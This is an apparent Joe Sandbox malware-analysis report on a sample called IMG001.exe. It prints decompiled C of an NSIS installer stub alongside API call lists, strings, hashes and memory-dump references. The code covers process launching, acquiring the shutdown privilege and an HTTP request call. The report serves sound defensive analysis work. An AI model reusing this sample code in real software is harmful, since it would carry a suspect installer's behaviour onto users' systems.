Opcode ID: 4c33de247a2d052fceca10c4812ed76368aa14416eb2bf5b6906024ac391082b
Instruction ID: 820ce69217e9910a2de0d02d30f5325d63aa1cf5a0373563638bb4a89b3f832c
Opcode Fuzzy Hash: 4c33de247a2d052fceca10c4812ed76368aa14416eb2bf5b6906024ac391082b
Instruction Fuzzy Hash: D7419FB2A4550AEFDB05DF9AC985BD97BBBEB40344B34021DE8079B388D730D990DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00405577, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405577(char _a4) {
				CHAR* _t3;
				char* _t5;
				CHAR* _t7;
				CHAR* _t8;
				void* _t10;

				_t1 =  &_a4; // 0x405329
				_t8 =  *_t1;
				_t7 = CharNextA(_t8);
				_t3 = CharNextA(_t7);
				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
					if( *_t8 != 0x5c5c) {
						L8:
						return 0;
					}
					_t10 = 2;
					while(1) {
						_t10 = _t10 - 1;
						_t5 = E0040550E(_t3, 0x5c);
						if( *_t5 == 0) {
							goto L8;
						}
						_t3 = _t5 + 1;
						if(_t10 != 0) {
							continue;
						}
						return _t3;
					}
					goto L8;
				} else {
					return CharNextA(_t3);
				}
			}

APIs

CharNextA.USER32()S@,?,007BA4B8,00000000,004055DB,007BA4B8,007BA4B8,?,?,00000000,00405329,?,007EE000,00000000), ref: 00405585
CharNextA.USER32(00000000), ref: 0040558A
CharNextA.USER32(00000000), ref: 00405599

Strings

)S@, xrefs: 00405580, 00405584

Memory Dump Source

Source File: 00000006.00000002.513034077.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.513026793.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.513046733.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.513055155.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513061571.000000000040B000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513067962.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513075385.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513670766.000000000078F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513698298.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513707301.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513715592.00000000007E0000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513721767.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_IMG001.jbxd

Similarity

API ID: CharNext
String ID: )S@
API String ID: 3213498283-798485370
Opcode ID: 68c7f773aafbecf3834176a21eebbfbca0b4bda0270daf5a8c718fc322178301
Instruction ID: 986bac38fae6e29e8d308ce63eb2e299cdb348cdc64b8b0e232f7fb5ff74d272
Opcode Fuzzy Hash: 68c7f773aafbecf3834176a21eebbfbca0b4bda0270daf5a8c718fc322178301
Instruction Fuzzy Hash: 91F0A791D05A21B7F72222644C49B6F5BADDB59710F140477E100B61D592BC4C82CFAA

Uniqueness

Uniqueness Score: -1.00%

Function 00402BBE, Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402BBE(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x79e458; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x7c56ac;
						if(_t2 >  *0x7c56ac) {
							_t3 = CreateDialogParamA( *0x7c56a0, 0x6f, 0, E00402B3B, 0);
							 *0x79e458 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00405D4B(0);
					}
				} else {
					_t6 =  *0x79e458; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x79e458 = 0;
					return _t6;
				}
			}

APIs

DestroyWindow.USER32(00000000,00000000,00402D9E,00000001), ref: 00402BD1
GetTickCount.KERNEL32 ref: 00402BEF
CreateDialogParamA.USER32(0000006F,00000000,00402B3B,00000000), ref: 00402C0C
ShowWindow.USER32(00000000,00000005), ref: 00402C1A

Memory Dump Source

Source File: 00000006.00000002.513034077.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.513026793.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.513046733.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.513055155.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513061571.000000000040B000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513067962.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513075385.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513670766.000000000078F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513698298.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513707301.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513715592.00000000007E0000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513721767.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_IMG001.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 88874edf8a5ad3d13e020ee7241d07db47261e91eb3adacc12eef60140851430
Instruction ID: 80c895a4a2db25b88506b6249782dcc22a13088abbe972e09fee96e79beaf169
Opcode Fuzzy Hash: 88874edf8a5ad3d13e020ee7241d07db47261e91eb3adacc12eef60140851430
Instruction Fuzzy Hash: 3FF0DA309096A0ABD651AF14BD4CD9B7B64AB09B11750843BF400B62E8DA7C78C18AAD

Uniqueness

Uniqueness Score: -1.00%

Function 73811E1B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34networkCOMMON

Download Yara Rule

APIs

HttpSendRequestExA.WININET(?,?,00000000,00000008,00000000), ref: 73811E54
HttpSendRequestA.WININET(?,00000000,00000000), ref: 73811E6D

Strings

(, xrefs: 73811E4D

Memory Dump Source

Source File: 00000006.00000002.517158202.0000000073811000.00000020.00020000.sdmp, Offset: 73810000, based on PE: true

Associated: 00000006.00000002.517148776.0000000073810000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.517168485.0000000073814000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.517176098.0000000073815000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.517187455.0000000073819000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_73810000_IMG001.jbxd

Similarity

API ID: HttpRequestSend
String ID: (
API String ID: 360639707-3887548279
Opcode ID: 33f36a37e1e48f6e1710f4cba36cb5b574e5f69db0741d8961ef0e14a5f7d561
Instruction ID: b40bb46f0a0550782a1e146648aec7a0db5228926011d04977089b92419f7765
Opcode Fuzzy Hash: 33f36a37e1e48f6e1710f4cba36cb5b574e5f69db0741d8961ef0e14a5f7d561
Instruction Fuzzy Hash: 91F09AB7900208BFEB01AF9ADC45AEE7FBAF7C8704F28C01DF506A7180D63189158B60

Uniqueness

Uniqueness Score: -1.00%

Function 00405250, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405250(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x7bccb8->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x7bccb8,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x00405259
0x00405275
0x0040527d
0x00405282
0x00000000
0x00405288
0x0040528c

APIs

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,007BCCB8,Error launching installer), ref: 00405275
CloseHandle.KERNEL32(?), ref: 00405282

Strings

Error launching installer, xrefs: 00405263

Memory Dump Source

Source File: 00000006.00000002.513034077.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.513026793.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.513046733.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.513055155.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513061571.000000000040B000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513067962.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513075385.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513670766.000000000078F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513698298.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513707301.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513715592.00000000007E0000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513721767.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_IMG001.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: a806c5310e6df0cebd73b3ad197dac461c1311b4ac174aae17594d044691e1cb
Instruction ID: 0073a5a0efbfdaf5d9279cd3ea2a775c5bd0ec7cfa46b84911e87675a244a577
Opcode Fuzzy Hash: a806c5310e6df0cebd73b3ad197dac461c1311b4ac174aae17594d044691e1cb
Instruction Fuzzy Hash: E0E0ECB4904209ABEB019FA4DD09EAB7BBCFB14304B008526BD15E2250D778D4108A79

Uniqueness

Uniqueness Score: -1.00%

Function 0040563C, Relevance: 5.0, APIs: 4, Instructions: 30
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040563C(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}

0x00405648
0x0040564a
0x00405672
0x00405657
0x0040565c
0x00405667
0x00000000
0x00405684
0x00405670
0x00405670
0x00000000

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,0040584A,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405643
lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0040584A,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040565C
CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 0040566A
lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,0040584A,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405673

Memory Dump Source

Source File: 00000006.00000002.513034077.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.513026793.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.513046733.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.513055155.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513061571.000000000040B000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513067962.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513075385.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513670766.000000000078F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513698298.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513707301.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513715592.00000000007E0000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513721767.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_IMG001.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
Instruction ID: 609bff5e62adcd4a62841177b0e089267a8c05f8bacb5303162b42a917934155
Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
Instruction Fuzzy Hash: 97F05C36209C919FC2025B344C04E2F6F98EF92318B54097AF444F3140D3369C119BBF

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: IMG001.exe PID: 4456 Parent PID: 528 IMG001.exeCOMMON

Execution Graph

Execution Coverage:	26.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	432
Total number of Limit Nodes:	13

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 004030DE, Relevance: 59.8, APIs: 24, Strings: 10, Instructions: 270
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			_entry_() {
				struct _SHFILEINFOA _v360;
				struct _SECURITY_ATTRIBUTES* _v376;
				char _v380;
				CHAR* _v384;
				char _v392;
				int _v396;
				int _v400;
				signed int _v404;
				CHAR* _v408;
				int _v412;
				struct _SECURITY_ATTRIBUTES* _v416;
				struct _SECURITY_ATTRIBUTES* _v424;
				void* _v432;
				int _t34;
				char* _t42;
				signed int _t44;
				void* _t48;
				int _t50;
				signed int _t51;
				signed int _t54;
				int _t55;
				signed int _t59;
				void* _t78;
				void* _t88;
				void* _t90;
				signed int _t96;
				void* _t97;
				signed int _t98;
				signed int _t99;
				signed int _t102;
				signed int _t105;

				_v376 = 0;
				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
				_t98 = 0;
				_v380 = 0x20;
				__imp__#17();
				_t34 = SetErrorMode(0x8001); // executed
				__imp__OleInitialize(0); // executed
				 *0x7c5758 = _t34;
				 *0x7c56a4 = E00405D12(8);
				SHGetFileInfoA(0x7a8468, 0,  &_v360, 0x160, 0); // executed
				E004059F0(0x7c16a0, "NSIS Error");
				E004059F0(0x7ee000, GetCommandLineA());
				 *0x7c56a0 = GetModuleHandleA(0);
				_t42 = 0x7ee000;
				if( *0x7ee000 == 0x22) {
					_v404 = 0x22;
					_t42 = 0x7ee001;
				}
				_t44 = CharNextA(E0040550E(_t42, _v404));
				_v404 = _t44;
				while(1) {
					_t90 =  *_t44;
					_t108 = _t90;
					if(_t90 == 0) {
						break;
					}
					__eflags = _t90 - 0x20;
					if(_t90 != 0x20) {
						L5:
						__eflags =  *_t44 - 0x22;
						_v404 = 0x20;
						if( *_t44 == 0x22) {
							_t44 = _t44 + 1;
							__eflags = _t44;
							_v404 = 0x22;
						}
						__eflags =  *_t44 - 0x2f;
						if( *_t44 != 0x2f) {
							L15:
							_t44 = E0040550E(_t44, _v404);
							__eflags =  *_t44 - 0x22;
							if(__eflags == 0) {
								_t44 = _t44 + 1;
								__eflags = _t44;
							}
							continue;
						} else {
							_t44 = _t44 + 1;
							__eflags =  *_t44 - 0x53;
							if( *_t44 == 0x53) {
								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
									_t98 = _t98 | 0x00000002;
									__eflags = _t98;
								}
							}
							__eflags =  *_t44 - 0x4352434e;
							if( *_t44 == 0x4352434e) {
								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
									_t98 = _t98 | 0x00000004;
									__eflags = _t98;
								}
							}
							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t44 - 2)) = 0;
								__eflags = _t44 + 2;
								E004059F0(0x7f0000, _t44 + 2);
								L20:
								GetTempPathA(0x2000, 0x7f8000); // executed
								_t48 = E004030AA(_t108);
								_t109 = _t48;
								if(_t48 != 0) {
									L22:
									DeleteFileA(0x7f6000); // executed
									_t50 = E00402C22(_t110, _t98); // executed
									_v412 = _t50;
									if(_t50 != 0) {
										L32:
										ExitProcess(); // executed
										__imp__OleUninitialize(); // executed
										if(_v404 == 0) {
											__eflags =  *0x7c5734;
											if( *0x7c5734 != 0) {
												_t105 = E00405D12(3);
												_t99 = E00405D12(4);
												_t54 = E00405D12(5);
												__eflags = _t105;
												_t96 = _t54;
												if(_t105 != 0) {
													__eflags = _t99;
													if(_t99 != 0) {
														__eflags = _t96;
														if(_t96 != 0) {
															_t59 =  *_t105(GetCurrentProcess(), 0x28,  &_v392);
															__eflags = _t59;
															if(_t59 != 0) {
																 *_t99(0, "SeShutdownPrivilege",  &_v396);
																_v412 = 1;
																_v400 = 2;
																 *_t96(_v416, 0,  &_v412, 0, 0, 0);
															}
														}
													}
												}
												_t55 = ExitWindowsEx(2, 0);
												__eflags = _t55;
												if(_t55 == 0) {
													E0040140B(9);
												}
											}
											_t51 =  *0x7c574c;
											__eflags = _t51 - 0xffffffff;
											if(_t51 != 0xffffffff) {
												_v396 = _t51;
											}
											ExitProcess(_v396);
										}
										E004052B1(_v404, 0x200010);
										ExitProcess(2);
									}
									if( *0x7c56bc == 0) {
										L31:
										 *0x7c574c =  *0x7c574c | 0xffffffff;
										_v400 = E00403539();
										goto L32;
									}
									_t102 = E0040550E(0x7ee000, 0);
									while(_t102 >= 0x7ee000) {
										__eflags =  *_t102 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t102 = _t102 - 1;
										__eflags = _t102;
									}
									_t114 = _t102 - 0x7ee000;
									_v408 = "Error launching installer";
									if(_t102 < 0x7ee000) {
										lstrcatA(0x7f8000, "~nsu.tmp");
										if(lstrcmpiA(0x7f8000, 0x7f4000) == 0) {
											goto L32;
										}
										CreateDirectoryA(0x7f8000, 0);
										SetCurrentDirectoryA(0x7f8000);
										if( *0x7f0000 == 0) {
											E004059F0(0x7f0000, 0x7f4000);
										}
										E004059F0(0x7c6000, _v396);
										 *0x7c8000 = 0x41;
										_t97 = 0x1a;
										do {
											E00405A12(0, _t97, 0x7a6468, 0x7a6468,  *((intOrPtr*)( *0x7c56b0 + 0x120)));
											DeleteFileA(0x7a6468);
											if(_v416 != 0 && CopyFileA(0x7fc000, 0x7a6468, 1) != 0) {
												_push(0);
												_push(0x7a6468);
												E0040573E();
												E00405A12(0, _t97, 0x7a6468, 0x7a6468,  *((intOrPtr*)( *0x7c56b0 + 0x124)));
												_t78 = E00405250(0x7a6468);
												if(_t78 != 0) {
													CloseHandle(_t78);
													_v416 = 0;
												}
											}
											 *0x7c8000 =  *0x7c8000 + 1;
											_t97 = _t97 - 1;
										} while (_t97 != 0);
										_push(0);
										_push(0x7f8000);
										E0040573E();
										goto L32;
									}
									 *_t102 = 0;
									_t103 = _t102 + 4;
									if(E004055C4(_t114, _t102 + 4) == 0) {
										goto L32;
									}
									E004059F0(0x7f0000, _t103);
									E004059F0(0x7f2000, _t103);
									_v424 = 0;
									goto L31;
								}
								GetWindowsDirectoryA(0x7f8000, 0x1ffb);
								lstrcatA(0x7f8000, "\\Temp");
								_t88 = E004030AA(_t109);
								_t110 = _t88;
								if(_t88 == 0) {
									goto L32;
								}
								goto L22;
							}
							goto L15;
						}
					} else {
						goto L4;
					}
					do {
						L4:
						_t44 = _t44 + 1;
						__eflags =  *_t44 - 0x20;
					} while ( *_t44 == 0x20);
					goto L5;
				}
				goto L20;
			}

APIs

#17.COMCTL32 ref: 004030FD
SetErrorMode.KERNELBASE(00008001), ref: 00403108
OleInitialize.OLE32(00000000), ref: 0040310F

Part of subcall function 00405D12: GetModuleHandleA.KERNEL32(?,?,00000000,00403121,00000008), ref: 00405D24
Part of subcall function 00405D12: LoadLibraryA.KERNELBASE(?,?,00000000,00403121,00000008), ref: 00405D2F
Part of subcall function 00405D12: GetProcAddress.KERNEL32(00000000,?), ref: 00405D40

SHGetFileInfoA.SHELL32(007A8468,00000000,?,00000160,00000000,00000008), ref: 00403137

Part of subcall function 004059F0: lstrcpynA.KERNEL32(?,?,00002000,0040314C,007C16A0,NSIS Error), ref: 004059FD

GetCommandLineA.KERNEL32(007C16A0,NSIS Error), ref: 0040314C
GetModuleHandleA.KERNEL32(00000000,007EE000,00000000), ref: 0040315F
CharNextA.USER32(00000000,007EE000,00000020), ref: 0040318A
GetTempPathA.KERNELBASE(00002000,007F8000,00000000,00000020), ref: 0040321D
GetWindowsDirectoryA.KERNEL32(007F8000,00001FFB), ref: 00403232
lstrcatA.KERNEL32(007F8000,\Temp), ref: 0040323E
DeleteFileA.KERNELBASE(007F6000), ref: 00403251
ExitProcess.KERNEL32(00000000), ref: 004032CA
OleUninitialize.OLE32(00000000), ref: 004032CF
ExitProcess.KERNEL32 ref: 004032EF
lstrcatA.KERNEL32(007F8000,~nsu.tmp,007EE000,00000000,00000000), ref: 004032FB
lstrcmpiA.KERNEL32(007F8000,007F4000,007F8000,~nsu.tmp,007EE000,00000000,00000000), ref: 00403307
CreateDirectoryA.KERNEL32(007F8000,00000000), ref: 00403313
SetCurrentDirectoryA.KERNEL32(007F8000), ref: 0040331A
DeleteFileA.KERNEL32(007A6468,007A6468,?,007C6000,?), ref: 00403364
CopyFileA.KERNEL32(007FC000,007A6468,00000001), ref: 00403378
CloseHandle.KERNEL32(00000000,007A6468,007A6468,?,007A6468,00000000), ref: 004033A5
GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 004033FA
ExitWindowsEx.USER32(00000002,00000000), ref: 00403436
ExitProcess.KERNEL32 ref: 00403459

Strings

~nsu.tmp, xrefs: 004032F5
NCRC, xrefs: 004031CA
_?=, xrefs: 00403278
SeShutdownPrivilege, xrefs: 0040340C
NSIS Error, xrefs: 0040313D
hdz, xrefs: 0040334D
/D=, xrefs: 004031E0
", xrefs: 004031AC
\Temp, xrefs: 00403238
Error launching installer, xrefs: 00403287

Memory Dump Source

Source File: 0000001A.00000002.272018747.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001A.00000002.272006337.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272026682.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272037031.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272044814.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272049498.000000000040D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272057902.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272068363.0000000000413000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272133807.0000000000783000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272141221.0000000000788000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272154119.000000000078D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272161383.000000000078F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272194145.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272208934.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272226018.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_IMG001.jbxd

Similarity

API ID: ExitFileProcess$DirectoryHandle$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$"$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$hdz$~nsu.tmp
API String ID: 553446912-3982731155
Opcode ID: d78d33de5b68f580e0f006418b0ffb6605f002c23cf02c91c73e52bd5a976f7d
Instruction ID: 1e8516f5ce796388342c1fc8f15df4c02dee863aaf22805bb0e40bc668e7fd09
Opcode Fuzzy Hash: d78d33de5b68f580e0f006418b0ffb6605f002c23cf02c91c73e52bd5a976f7d
Instruction Fuzzy Hash: B0911171904741AEE7216F618C49B2B3E9CEF05306F04457EF581BA2D2CB7C99448B6F

Uniqueness

Uniqueness Score: -1.00%

Function 00405CEB, Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405CEB(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x7bcd00); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x7bcd00;
			}

0x00405cf6
0x00405cff
0x00000000
0x00405d0c
0x00405d02
0x00000000

APIs

FindFirstFileA.KERNELBASE(?,007BCD00,007BA4B8,00405607,007BA4B8,007BA4B8,00000000,007BA4B8,007BA4B8,?,?,00000000,00405329,?,007EE000,00000000), ref: 00405CF6
FindClose.KERNEL32(00000000), ref: 00405D02

Memory Dump Source

Source File: 0000001A.00000002.272018747.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001A.00000002.272006337.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272026682.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272037031.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272044814.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272049498.000000000040D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272057902.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272068363.0000000000413000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272133807.0000000000783000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272141221.0000000000788000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272154119.000000000078D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272161383.000000000078F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272194145.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272208934.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272226018.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_IMG001.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 1ca473d55b8aa3f231cefed5bcfc42c0dfe78d3d248200b2f8c286e45b37ad6d
Instruction ID: a9cba8e735bd77091c38ad40f287727c35eedbeaf980a92083549f84fef47ecd
Opcode Fuzzy Hash: 1ca473d55b8aa3f231cefed5bcfc42c0dfe78d3d248200b2f8c286e45b37ad6d
Instruction Fuzzy Hash: AFD0C9359195206BC20117286C0C98B6A58DF05330720DA32B025E22E0C2349C518AA9

Uniqueness

Uniqueness Score: -1.00%

Function 00403539, Relevance: 44.0, APIs: 16, Strings: 9, Instructions: 216
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00403539() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				int _t42;
				char _t62;
				CHAR* _t64;
				signed char _t68;
				signed short _t72;
				CHAR* _t79;
				intOrPtr _t81;
				CHAR* _t86;

				_t81 =  *0x7c56b0;
				_t20 = E00405D12(6);
				_t88 = _t20;
				if(_t20 == 0) {
					_t79 = 0x7b04b0;
					 *0x7f6000 = 0x7830;
					E004058D7(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x7b04b0, 0);
					__eflags =  *0x7b04b0;
					if(__eflags == 0) {
						E004058D7(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x7b04b0, 0);
					}
					lstrcatA(0x7f6000, _t79);
				} else {
					_t72 =  *_t20(); // executed
					E0040594E(0x7f6000, _t72 & 0x0000ffff);
				}
				E00403802(_t76, _t88);
				 *0x7c5720 =  *0x7c56b8 & 0x00000020;
				 *0x7c573c = 0x10000;
				if(E004055C4(_t88, 0x7f0000) != 0) {
					L16:
					if(E004055C4(_t96, 0x7f0000) == 0) {
						E00405A12(0, _t79, _t81, 0x7f0000,  *((intOrPtr*)(_t81 + 0x118)));
					}
					_t28 = LoadImageA( *0x7c56a0, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x7c1688 = _t28;
					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E00403802(_t76, __eflags);
							__eflags =  *0x7c5740;
							if( *0x7c5740 != 0) {
								_t31 = E00404E60(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x7c166c;
								if( *0x7c166c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x7b0488, 5);
							_t37 = LoadLibraryA("RichEd20");
							__eflags = _t37;
							if(_t37 == 0) {
								LoadLibraryA("RichEd32");
							}
							_t86 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t86, 0x7c1640);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x7c1640);
								 *0x7c1664 = _t86;
								RegisterClassA(0x7c1640);
							}
							_t42 = DialogBoxParamA( *0x7c56a0,  *0x7c1680 + 0x00000069 & 0x0000ffff, 0, E004038CF, 0);
							E00403489(E0040140B(5), 1);
